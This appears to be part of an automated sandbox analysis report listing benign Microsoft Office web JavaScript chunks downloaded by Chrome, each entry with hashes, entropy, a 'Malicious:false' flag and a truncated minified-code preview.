                              SHA-512:FECFE455CC2F559345E19D76A66F4037E1D0C482FE0712D1E6C0F8910550A72197548E9CEC35190EA0C2FA17020D9404C8EB0CB00621E166640989C6366A0336
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/35.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[35],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){function t
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (38665)
                              Category:downloaded
                              Size (bytes):69078
                              Entropy (8bit):5.312822774580461
                              Encrypted:false
                              SSDEEP:
                              MD5:3D71776BF7B9194BDFC2367C84E5A7B8
                              SHA1:A59DB1310DF4D074A6F89BBAB0E0F169DF34F36E
                              SHA-256:651571D8ABD48E132F1C84C811E8555453DDA2A5668FB70BE71F3EAA63D351FC
                              SHA-512:7A08C14AA4C6AE1A1B30CA917AB38C494BAB0C15BAACA6655DAB68307F5E2798F0F43636B9B8321C3768AB91682C03F68B06A9F0517285EE5FEA2C00E67EFFA9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/60.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[60,36],{984:(e,t,n)=>{n.r(t),n.d(t,{DataBatchOperationHelper:()=>c,default:()=>d});var a=n(51),i=n(2063),r=n(77),o=n("odsp.util_578"),s=o.HW.isActivated("2b1ee267-3309-486b-8be8-994d0fcadf3f"),c=function(){function e(){}return e.getBatchOperationUrl=function(e,t){return new i.b({webAbsoluteUrl:!e&&t?new r.a(t).authority:e}).build().segment("$batch").toString()},e.processErrorResponse=function(e,t){var n={id:t};if((e=e.error?e.error:e)&&e.code){var a=e.code?e.code.split(","):e.error.code.split(","),i=Number(a[0]),r=s||"string"!=typeof e.message?e.message.value:e.message;n.error={code:i,message:r}}return{items:[n]}},e.getBatchResponseText=function(e){var t,n,a,i=[];if(e.split("\n").length>0&&(t=e.split("\n")[0]),t){n=(e=e.replace(t.trim()+"--","")).split(t);for(var r=1;r<n.length;r++)(a=n[r].split("\n\r")).length>2&&i.push(a[2])}return i},e.processBatchResponse=function(e,t,n){var a,i,r,o,s=[],c=!1;if(e&&e.spli
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4078)
                              Category:downloaded
                              Size (bytes):7191
                              Entropy (8bit):5.135156301738665
                              Encrypted:false
                              SSDEEP:
                              MD5:6007C79B3E3A8929AFF9144179E34F27
                              SHA1:B3784C48E523A74F94C4FCF6DD72ECB4CE0AE907
                              SHA-256:C02D621D4EC6794F2E853DBC2C4E122ED2F0E5AB61363630FE9008B5691DD45C
                              SHA-512:C0E06BAFF1845FB0DC1AED2DFA4AAEA742247781F345536EE994193A84EA6958FE0C619E5498C8825B5CE2D6B344EDCB05393B6430F13307B20A442427C6B740
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/92847.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[92847],{822866:(e,t,n)=>{n.d(t,{D:()=>r});var a=n(295610),i=new Map;function r(e,t,n){var r=void 0!==n?n:{};return i.forEach(function(n,i){var o;(void 0===n.precond||n.precond(e,t))&&(r instanceof Headers?r.has(i)||r.set(i,n.value):void 0!==r&&(i in r||(r=(0,a.__assign)((0,a.__assign)({},r),((o={})[i]=n.value,o)))))}),r}}.,224252:(e,t,n)=>{var a;function i(e,t,n,i){n=n||{},i=i||{};var r=[e,t].filter(function(e){return e.length}).join("/"),o={id:"",apiVersion:""},s=r.replace(/:(\w+?)(\W|$)/g,function(e,t,r){if(!n[t])return""+r;var s=n[t];return"string"==typeof s&&"@"===s[0]&&(s=a.lookupDottedPath(i||{},s.substring(1))),"function"==typeof s&&(s=s()),o[t]=s,s+r}),c={};Object.keys(n).forEach(function(e){if(!o[e]){var t=n[e];c[e]="function"==typeof t?t():t}}),s=s.split("://").map(function(e){return e.replace(/[\/]{2,}/g,"/")}).join("://"),s=a.encodeUri(s);var d=a.getQueryString(c);return d&&(s=s+
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8846)
                              Category:downloaded
                              Size (bytes):15829
                              Entropy (8bit):5.3016271680997376
                              Encrypted:false
                              SSDEEP:
                              MD5:42C572C77452329A02AE8204B81F4734
                              SHA1:0B8D5D3A348207C88987A6CB06DB4C48D9181D58
                              SHA-256:B97927CAA502F46F8E5D646EB2A6F818CCD4F7798E852A61DB60A0F5F15538D2
                              SHA-512:FA9065AE927711269387B7E95E3E003CCB18531A1C69D2F8E91DD0F0D74C822CADC8403A58ED0E74651B716ED7802B0FDABE84F6C673CAE4B9B90158EAC6E869
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/543.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[543],{2182:function(e,t,n){var a=n(115),i=function(){function e(){}return e.prototype.debounce=function(e){var t=this;this.clear(),this._originalPromise=e;var n=new a.a(function(){return t._originalPromise.cancel()});return this._originalPromise.done(function(e){t._clear(!1),n.complete(e)},function(e){t._clear(!1),n.error(e)}),n.getPromise()},e.prototype.clear=function(){this._clear(!0)},e.prototype.isExecuting=function(){return Boolean(this._originalPromise)},e.prototype._clear=function(e){this.isExecuting()&&(e&&this._originalPromise.cancel(),this._originalPromise=null)},e}();t.a=i}.,2950:function(e,t,n){n.d(t,{a:function(){return c}});var a=n(23),i=n(14),r=n("odsp.util_578"),o=n(97),s=function(){function e(e,t){this._ticketRedeemer=t.ticketRedeemer}return e.prototype.redeemItem=function(e,t,n){return this.redeemItems([e],t,n)},e.prototype.redeemItems=function(e,t,n){return e&&e.some(function(e){return e&&e
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4930)
                              Category:downloaded
                              Size (bytes):10223
                              Entropy (8bit):5.363677467889665
                              Encrypted:false
                              SSDEEP:
                              MD5:6D2906F0D9C52738841820F8BAEB8AC0
                              SHA1:655B7C7B0F7EBFC78CE59F5807ABFFA33691E6E5
                              SHA-256:3391F600E2C1B3FA333A1D196416B58B6173859150C8AA9C4A987D76DA937AB4
                              SHA-512:70084086F2022A1D5023AB2FE0174BAB1FDDCADC5A42D3CB57E9D0F5BCDE4C0031D7308000113CDBC5776BAEFB1F7FF2DFA1367E4FCB98E5A4AFFCF70FE6E045
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/24.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[24],{1032:(e,t,n)=>{n.d(t,{a:()=>a.a,b:()=>i.a,c:()=>i.b,d:()=>r.a}),n(124),n(35);var a=n(16),i=n(7),r=(n(65),n(8),n(27),n(109),n(22),n(101));n(178)}.,653:(e,t,n)=>{n.r(t),n.d(t,{CustomFormatter:()=>a.CustomFormatter,SUPPORTED_FIELDS:()=>a.SUPPORTED_FIELDS,astify:()=>a.astify,astifyExpression:()=>a.astifyExpression,evaluateExpression:()=>a.evaluateExpression,getExpressionEvaluator:()=>o,gridRowSelectionHandlerKey:()=>_,isCustomFormatterAction:()=>a.isCustomFormatterAction,makeCustomFormatterFieldRenderer:()=>i.a,readInputFromActionPath:()=>a.readInputFromActionPath,validateDeferredImageUrls:()=>a.validateDeferredImageUrls});var a=n("custom-formatter-lib"),i=n(2062),r=n(89);function o(e){var t=e.listSchema,n=e.pageContext,a=e.expression;if(a){var i=r.a.astifyExpression,o=null==i?void 0:i(a),s=t.customFormatterSchema;return function(e){var t=e.item,a=e.itemIndex,i=e.isSelected,c=r.a.evaluateExpression;return nu
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (7057)
                              Category:downloaded
                              Size (bytes):124464
                              Entropy (8bit):5.060367292798937
                              Encrypted:false
                              SSDEEP:
                              MD5:765FD902EA23E403AB1430C2F5C42241
                              SHA1:025ECA8FCEDF3884BBAAA648BA3B075B48DDDEE5
                              SHA-256:13C05839437E685D74EAD77A7B85149961D5D7C304A7425AB70A65C470082E39
                              SHA-512:6526E4E28811047B44A9D55F017CDBBED447EDB7E98B5531CE26BF9A5368902BD89BE497990F3B55102579817AABF45FCCFFE89B1B062B2D44692B9DE38DEC09
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/en-us/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{2266:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,2455:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9250)
                              Category:downloaded
                              Size (bytes):28176
                              Entropy (8bit):5.49374198025594
                              Encrypted:false
                              SSDEEP:
                              MD5:483866C088DA9558A8FB78F086904311
                              SHA1:50EF84ADFCC54ED4F8ACD29DB963FC3C2152F3C2
                              SHA-256:F86664D8B2FD8B3AE224178E30B21894CA306C5614612ADF9B674A5761E8FFED
                              SHA-512:570CEFC19CA22EAB038C60251C07A6D3F620CB83398C6B62FF560EED0CA3C473C4AA23DEEABD9C453278A3A9D3DF87C5DE3719EC4223EE4421A0544685604C3F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/deferred.odsp-common.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.odsp-common"],{2060:(e,t,n)=>{var a;function i(){return a||"function"!=typeof BroadcastChannel||(a=new BroadcastChannel("sw_broadcast")),a}n.d(t,{a:()=>r,b:()=>i});var r={OfflineNotification:"OfflineNotification",CheckOffline:"CheckOffline",ServiceWorkerRegistered:"ServiceWorkerRegistered",ScriptSynced:"ScriptSynced"}}.,2059:(e,t,n)=>{n.d(t,{a:()=>r});var a=n(267),i=n(474);function r(){return(0,a.a)({data:{url:location.href,type:i.a.preloadPage}})}}.,2058:(e,t,n)=>{n.d(t,{a:()=>c});var a=n("tslib_102"),i=n("odsp.util_578"),r={FluentUIV9ShimOverallControl:60077,FluentUIV9ShimDefaultButton:60337,FluentUIV9ShimPrimaryButton:60344,FluentUIV9ShimIconButton:60355,FluentUIV9ShimActionButton:60356,FluentUIV9ShimImage:60357,FluentUIV9ShimToggle:60461,FluentUIV9ShimCommandBarButton:60466,FluentUIV9ShimCommandBar:60480,FluentUIV9ShimCommandButton:60501,FluentUIV9ShimTooltipHost:60634,FluentUIV9ShimTooltip:6063
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3324)
                              Category:downloaded
                              Size (bytes):11507
                              Entropy (8bit):5.210107277442613
                              Encrypted:false
                              SSDEEP:
                              MD5:19735595C170400909ACA2D72796F174
                              SHA1:558DFC44CD29CB28272DA9230D7994710A0944C5
                              SHA-256:06FE882E9B05F2A9399432D21C4BFB5072D889A62C91733AD57256A39ABBB080
                              SHA-512:BA8418EB7BDBCC92D98BEEE2FC3DF74DFEC2050AC120995B764627ED8967E01E8A478D515FB387AEB56288C78C40C25ED1C22E5588C05F103451D7457E881CF0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/10.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[10,690],{2124:function(e,t){var n=function(){function e(){}return e.init=function(e,t,n,a,i){t()(e)},e}();t.a=n}.,2178:function(e,t,n){var a=n("tslib_102"),i=n("knockout-lib"),r=n(2353),o=n(2091);function s(e){var t=document.createElement("div");return t.tabIndex=0,t.className="ms-accessible",t.setAttribute("role","presentation"),t.setAttribute("aria-hidden","true"),t.setAttribute("data-focus-trap",e),t}var c=r.getNextTabStop,d=r.focusNextTabStop,l=r.focusPreviousTabStop,u=r.FocusTrapKillSwitchActivated,f=i.virtualElements,p=i.applyBindingsToNode,m=i.applyBindingsToDescendants,_=function(e){function t(t){var n=e.call(this,t)||this;n._onParentMutation=function(){var e,t;if(n._beforeHook&&n._afterHook&&n._beforeHook.isConnected&&n._beforeHook.parentElement){var a=null===(e=n._before)||void 0===e?void 0:e.peek(),i=null===(t=n._after)||void 0===t?void 0:t.peek(),r=!1,o=c(n._beforeHook,void 0,!0);o&&o!==n._afterHo
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3562)
                              Category:downloaded
                              Size (bytes):6035
                              Entropy (8bit):5.344151289916681
                              Encrypted:false
                              SSDEEP:
                              MD5:5639226198E9F2D733B9406F56D02247
                              SHA1:ED5E7E8E358C609DF533C83D645DA585DFE384B7
                              SHA-256:A03AC088F1C1F11A575821BB0A7340CCAFCD5330CB5AFBEFF74924B94FEF23F4
                              SHA-512:388388D39CC1DFFEBD6D7516597E3DB879E55EAA8EE1280D9C98F2CCAE156F60BD4E1E9FB1F01C50D763D5E0348882EC06FFC775CDB4498ADD38E28843813EF5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/233.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[233,253],{2001:(e,t,n)=>{n.r(t),n.d(t,{setListRatingExperienceResourceKey:()=>d});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(1052),o=n(180),s=n(24),c=n(85),d=new i.qT({name:"SetListRatingExperience.key",factory:{dependencies:{spListDataSource:r.SpListDataSourceKey,resources:i.lh,getListViewProvider:o.a.async,refreshCurrentListDataAsync:c.a.lazy.async},create:function(e){var t=e.spListDataSource,r=e.resources,o=e.getListViewProvider,c=e.refreshCurrentListDataAsync;return{instance:function(e,d,l,u){return(0,a.Zd)(void 0,void 0,void 0,function(){var f,p,m,_,h,b,g,v,y,S,D,I,x;return(0,a.qr)(this,function(a){switch(a.label){case 0:f=function(e,t,n){return[e,t,n].filter(function(e){return e}).join("-")},p=(0,s.b)().Telemetry,m=new p.QosEvent({name:"setListRatingExperience"}),a.label=1;case 1:a.trys.push([1,16,,20]),a.label=2;case 2:return a.trys.push([2,4,,5]),[4,t.setListRating(e)];case 3:return a.sent(),[3,5];
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11244)
                              Category:downloaded
                              Size (bytes):37806
                              Entropy (8bit):5.5420759363426155
                              Encrypted:false
                              SSDEEP:
                              MD5:B4524174893632AD1DDED37FBB4D68A7
                              SHA1:79C95FE53EF13DF1A4343CBEC866A8B1BA0465B3
                              SHA-256:C0B204EFFAC7FB9B081FCF7D07430A02F506CD721D38B2246EF4D4A533954306
                              SHA-512:8B9F3861156CD31EBBE0ADCA8C876850E1A7CB1AFEAB96ACD76BE5AF8BFC9A5D9B94BF3FFD978EBBB4A41046F3B96766B568F922FACECE5148FA3FBAA8EE8C78
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/92049.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[92049],{357898:(e,t,n)=>{n.d(t,{A1g:()=>a});const a=(0,n(875427).k)("TextAlignLeft16Regular","16",["M1 3.5c0-.28.22-.5.5-.5h9a.5.5 0 0 1 0 1h-9a.5.5 0 0 1-.5-.5Zm0 4c0-.28.22-.5.5-.5h13a.5.5 0 0 1 0 1h-13a.5.5 0 0 1-.5-.5Zm0 4c0-.28.22-.5.5-.5h5a.5.5 0 0 1 0 1h-5a.5.5 0 0 1-.5-.5Z"])}.,485323:(e,t,n)=>{n.d(t,{Pzl:()=>r,Vab:()=>i});var a=n(875427);const i=(0,a.k)("TopSpeed20Regular","20",["M5.42 4.7A6.97 6.97 0 0 1 9.5 3.03V4.5a.5.5 0 0 0 1 0V3.02A7 7 0 0 1 16.93 9H15a.5.5 0 0 0 0 1h2c0 2-.86 3.9-2.21 5.17a.5.5 0 0 0 .69.73A8.17 8.17 0 0 0 18 10a8 8 0 1 0-13.44 5.9.5.5 0 0 0 .69-.73A7.2 7.2 0 0 1 3 10h2a.5.5 0 1 0 0-1H3.07c.2-1.36.78-2.6 1.64-3.58l1.44 1.43a.5.5 0 0 0 .7-.7L5.42 4.7Zm8.03 1.1a.5.5 0 0 1 .75.64l-.12.2a343.95 343.95 0 0 1-2.2 3.82 30.11 30.11 0 0 1-.65 1.01 1.5 1.5 0 0 1-2.28-1.94c.07-.09.2-.2.34-.33l.56-.48a123.93 123.93 0 0 1 3.42-2.77l.18-.14Z"]),r=(0,a.k)("Video20Regular","
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (20515)
                              Category:downloaded
                              Size (bytes):23803
                              Entropy (8bit):5.273233966491322
                              Encrypted:false
                              SSDEEP:
                              MD5:0B2E04703FE0F1C748C408F1ECACD04C
                              SHA1:61AFF130F7A00E449884C5A730747BF0831B57A8
                              SHA-256:3D4AA10C72FD030E42BDD142E6214117756CB4CDD189F7D5E09CCB02CD7E0B46
                              SHA-512:26B157F4682EE1027A3934CB0B301681F01A364C016E7D7854AAAAAF2078A44B7724DA22AD83C37C7DAABF7B7765067DF3BCB2734690B155A3CF1AE6A82BE522
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/30.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[30],{2549:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("odsp.util_578").HW.isActivated("260137F4-5C58-41AD-BDC6-F936079B7881","09/22/2023","Unobtrusive window state manager");const i=function(){function e(){}return e.prototype.getState=function(e){var t=this._getNormalizedWindowName();if(t)return t[e]},e.prototype.setState=function(e,t){var n=this._getNormalizedWindowName();n&&(n[e]=t,window.name=JSON.stringify(n))},e.prototype.removeState=function(e){var t=this._getNormalizedWindowName();if(t){var n=t[e];return delete t[e],window.name=JSON.stringify(t),n}},e.prototype._getNormalizedWindowName=function(){var e,t;if(a||!window.name||"{"===window.name[0])try{t=JSON.parse(window.name)||{}}catch(e){t={}}return a&&"object"!=typeof t&&((e={}).value=t,t=e),t},e}()}.,1539:(e,t,n)=>{n.r(t),n.d(t,{ISPRESERVEPARENTVIEWPARAMS_KSACTIVATED:()=>N,default:()=>j,resourceKey:()=>V,supportsOneUpResourceKey:()=>R});var a=n("tslib_102"),i=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8432)
                              Category:downloaded
                              Size (bytes):33648
                              Entropy (8bit):5.476207559513165
                              Encrypted:false
                              SSDEEP:
                              MD5:CE64CDAB032E573BF055723352685AE1
                              SHA1:62AEAC3DB6FFEBF1381CD5B439709FD3F888B46E
                              SHA-256:CD4FA4C0A2E664E990735A4D569F3681A404936F279E6E8C19BCDF963537ED43
                              SHA-512:F32D128115828295D696A70A1B62DB40CD711B51CFD4CD8D4E552E2FBCAE1A15DB9AD216F01DAA86086C7DBBCE30F7519B947B7FACE5BFC15536E52C1FF31C32
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/15.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[15],{3814:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("react-lib");function i(e){const t=a.useContext(e);return!!t.version&&-1!==t.version.current}}.,6449:(e,t,n)=>{n.d(t,{a:()=>u});var a=n("react-lib"),i=n("fui.core_238"),r=n(5458),o=n(5462),s=n(5461);const c=(0,i.R74)("r78gbj",null,{r:[".r78gbj{column-gap:8px;row-gap:8px;height:fit-content;box-sizing:border-box;display:flex;grid-row-start:3;grid-row-end:3;}"],s:["@media screen and (max-width: 480px){.r78gbj{flex-direction:column;justify-self:stretch;}}"]}),d=(0,i.Xx5)({gridPositionEnd:{Bdqf98w:"f1a7i8kp",Br312pm:"fd46tj4",Bw0ie65:"fsyjsko",B6n781s:"f1f41i0t",Bv5d0be:"f1jaqex3",v4ugfu:"f2ao6jk"},gridPositionStart:{Bdqf98w:"fsxvdwy",Br312pm:"fwpfdsa",Bw0ie65:"f1e2fz10",Bojbm9c:"f11ihkml",Bv5d0be:"fce5bvx",v4ugfu:"f2ao6jk"},fluidStart:{Bw0ie65:"fsyjsko"},fluidEnd:{Br312pm:"fwpfdsa"}},{d:[".f1a7i8kp{justify-self:end;}",".fd46tj4{grid-column-start:2;}",".fsyjsko{grid-col
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65019)
                              Category:downloaded
                              Size (bytes):106392
                              Entropy (8bit):5.142290197627957
                              Encrypted:false
                              SSDEEP:
                              MD5:817A3073B9DBAFFDB5A986BA8FD58517
                              SHA1:7B9B2E5D2A35696316477B318B9613AB4ACC1AA1
                              SHA-256:F9070C9BD169D76B70A48F39D04931DCE191F3AB83540EA18F2CBD0BF57E5997
                              SHA-512:8C18D5FC7C6D603310BC380F9066706422CE9DC28D7461D725E01953D922D275DEE8DEE13CE3127C0B9CFFF5EA1817351C95845956D8EF2F48C702F867479588
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/136.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[136],{2171:function(e,t){var n=/[<>&'"\\]/g,a=/(&lt;|&gt;|&amp;|&quot;|&#39;|&#92;)/g,i={"<":"&lt;",">":"&gt;","&":"&amp;",'"':"&quot;","'":"&#39;","\\":"&#92;"},r={"&lt;":"<","&gt;":">","&amp;":"&","&quot;":'"',"&#39;":"'","&#92;":"\\"};function o(e){return i[e]}var s=function(){function e(){}return e.encodeText=function(e){return e?e.replace(n,o):""},e.decode=function(e){return e?e.replace(a,function(e){return r[e]}):""},e}();t.a=s}.,3732:function(e,t,n){(0,n("fui.util_150").pZ)([{rawString:"html body .ms-bgColor-communicationShade30,html body .ms-bgColor-communicationShade30--hover:hover{background-color:#004578}html body .ms-bgColor-communicationShade20,html body .ms-bgColor-communicationShade20--hover:hover{background-color:#005a9e}html body .ms-bgColor-communicationShade10,html body .ms-bgColor-communicationShade10--hover:hover{background-color:#106ebe}html body .ms-bgColor-communicationPrimary,html bod
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):275
                              Entropy (8bit):5.398663728196551
                              Encrypted:false
                              SSDEEP:
                              MD5:CC9C256657DD1927072E37AA6DA42B9C
                              SHA1:EE1CDE43972C1EFE803FF66B550815CB031E8585
                              SHA-256:F16999862DC9F736D3C3B0801863FD38B76577EAE2C19A799872C9313D1CD45A
                              SHA-512:561EC9FF28B6855EA4C32D635228F6289502119F903C910A3D5502B4D54E474B51691199D23D706212C4A5BFD3B8B78630F1ED07BF4E902003DB4CC8EE078575
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/nextGenEngine.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[99948],{146152:(e,t,n)=>{n.r(t),n.d(t,{PlaybackSourceProviderBase:()=>i.e,PlayerEngineAdaptor:()=>a.C,setVideoElementStyle:()=>r.Es});var a=n(748591),i=n(690938),r=n(910589)}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6948)
                              Category:downloaded
                              Size (bytes):9689
                              Entropy (8bit):5.26203613126381
                              Encrypted:false
                              SSDEEP:
                              MD5:55360DFC0DE39582914A07735A1F301C
                              SHA1:2285089EA77728DEB403C4B5B75545BA51E3BD3B
                              SHA-256:E0476DD234C5FD64A8F50AC5E4E2FB632FCB00E141E0F1BB5AE1FAACA716F607
                              SHA-512:B29F5E7B68147A3C209D2558154D2A85ADC850F3C858B49C66462A3C78A67CFA1C884982C2FACAB94C8B9EA210610B015B49A80BD69D7BF69A8B14493EBCF4FD
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/93.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[93],{878:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>d,c:()=>c});var a=n(53),i=n(289),r=n(760),o=n(761),s={idParamKey:a.b,parentIdParamKey:o.a,driveIdParamKey:"driveId",driveEndpointParamKey:"endpoint",queryTypeParamKey:"view",pageParamKey:"p",parentQueryTypeParamKey:"parentview",windowNameJsonKey:"ODBParams",queryParamKey:a.h,conversationIdParamKey:"cvid",metadataSearchIdKey:a.f,uniqueParamKey:"u",navParamKey:"nav",localeKey:"locale",dateFilterKey:"dateFilter",typeFiltersKey:a.j,userFiltersKey:"userFilters",viewIdKey:a.k,viewPathKey:a.l,isPowerAppView:"isPowerAppView",listIdKey:a.d,listUrlKey:a.e,sortFieldKey:a.i,isAscendingKey:a.c,policyTipKey:"policyTipForListItemId",sharingKey:"sharingDialogForListItemId",openShare:"openShare",managePermissionsKey:"managePermissionsForListItemId",pseudoPolicyTipKey:"showpolicytips",groupByKey:a.a,errorTypeKey:"type",correlationIdKey:"correlation",approvalItemVersion:"approvalItemVersi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (34941)
                              Category:downloaded
                              Size (bytes):100621
                              Entropy (8bit):5.25510864021314
                              Encrypted:false
                              SSDEEP:
                              MD5:2A2BDEA8CF30CA4271B21C93742D7721
                              SHA1:738C3EE9B0A2CAB3FAA9F6D322FA9C71715134D6
                              SHA-256:286141E9E295EC4B43A5FC718786FFCFEC795D34B940714D59926D7D7D3CB055
                              SHA-512:575259EC1B74D8911B99C4DD2244BD0838460C90E1C2638431D78F10D92FB734AC9AD751232188B3443E85F1BCA2DE223748FEA9BE332DB0C25B0D5AA38AB858
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/30.js
                              Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[30,1042,1210],{2180:function(e,t,n){var a;!function(i,r){"use strict";var o=function(e){if("object"!=typeof e.document)throw new Error("Cookies.js requires a `window` with a `document` object");var t=function(e,n,a){return 1===arguments.length?t.get(e):t.set(e,n,a)};return t._document=e.document,t._cacheKeyPrefix="cookey.",t._maxExpireDate=new Date("Fri, 31 Dec 9999 23:59:59 UTC"),t.defaults={path:"/",secure:!1},t.get=function(e){return t._cachedDocumentCookie!==t._document.cookie&&t._renewCache(),t._cache[t._cacheKeyPrefix+e]},t.set=function(e,n,a){return(a=t._getExtendedOptions(a)).expires=t._getExpiresDate(n===r?-1:a.expires),t._document.cookie=t._generateCookieString(e,n,a),t},t.expire=function(e,n){return t.set(e,r,n)},t._getExtendedOptions=function(e){return{path:e&&e.path||t.defaults.path,domain:e&&e.domain||t.defaults.domain,expires:e&&e.expires||t.defaults.expires,secure:e&&e.secure!==r?e.secure:t.defaults.secure
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8897)
                              Category:downloaded
                              Size (bytes):20804
                              Entropy (8bit):5.382639920295271
                              Encrypted:false
